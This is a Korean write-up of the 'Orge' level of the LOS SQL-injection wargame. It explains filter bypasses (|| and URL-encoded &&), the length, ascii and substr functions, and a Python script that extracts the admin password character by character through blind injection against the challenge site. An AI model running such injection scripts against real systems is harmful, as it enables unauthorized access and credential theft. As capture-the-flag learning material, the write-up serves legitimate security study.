[Orge] LOS 문제풀이7

   [Orge] LOS 문제풀이7

SQL Injection Web Hacking

LOS 사이트 : http://los.eagle-jump.org/

[힌트]

1. 주석처리

   # : %23  ' : %27

2. or and 우회

   or 우회 : ||

   and 우회 : && (url)

3. 패스워드 하나씩 찾기

   length : 패스워드 길이

   ex) length('apple') = 5 -> 반환값 : 1 (true)

    ascii 사용법 : 아스키코드표를 이용해서 문자를 10진수로 바꿀 수 있다.

   ex) ascii('a') = 97 -> 반환값 : 1 (true)

   substr 사용법 : 문자열에서 일부 문자열을 추출한다.

   ex) substr(문자열, 시작위치, 갯수)

        substr('apple',1,1) -> 반환값 : 'a'

        substr('apple',1,2) -> 반환값 : 'ap'

저번 Orc 문제와 마찬가지로 패스워드를 하나씩 찾는 문제다. Orc와 다른점이라면 and, or 가 우회되어있다.

전단계처럼 and와 or 를 우회해서 풀면 된다. 주의할 점은 and 같은 경우 url 안에서 & 기호가 먹히지 않기 때문에 (url에서 인코딩되어 전송되기 때문에)

꼭 url 인코딩 된 값으로 변환해 넣어줘야 한다. & URL 기호는 : %26

먼저 length를 사용해서 패스워드 길이를 알아낸다.

패스워드의 길이는 8이라는 것을 알아냈다. 그러고 나서 ascii와 substr를 이용해서 하나씩 찾아낸다.

하나씩 찾아낸 뒤에는 패스워드를 입력하면 orge문제는 풀린다.

[Orge 자동화프로그램] - Python3

# LOS Orge
 
import socket
 
for i in range(1,9):
    for ch in range(48,123):
        if 58 <= ch <= 64: continue
        if 91 <= ch <= 96: continue
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect(('104.27.174.42',80))
 
        header = "GET /orge_40d2b61f694f72448be9c97d1cea2480.php"
        header += "?pw=' || id='admin' %26%26 ascii(substr(pw,"+str(i)+",1))="+str(ch)+"%23 "
        header += "HTTP/1.1\r\n"
        header += "Host:los.eagle-jump.org\r\n"
        header += "Cookie:PHPSESSID=44b0qo6127nchlhrrohm2scc93\r\n" # 쿠키는 현재 갖고있는 세션값
        header += "\r\n"
 
        response = ''
    
        sock.send(header.encode())
        response = sock.recv(65535)
        response = response.decode()
        if "Hello admin" in response:
            print(chr(ch),end='',flush=True)
            sock.close()
            break;
        sock.close()
print()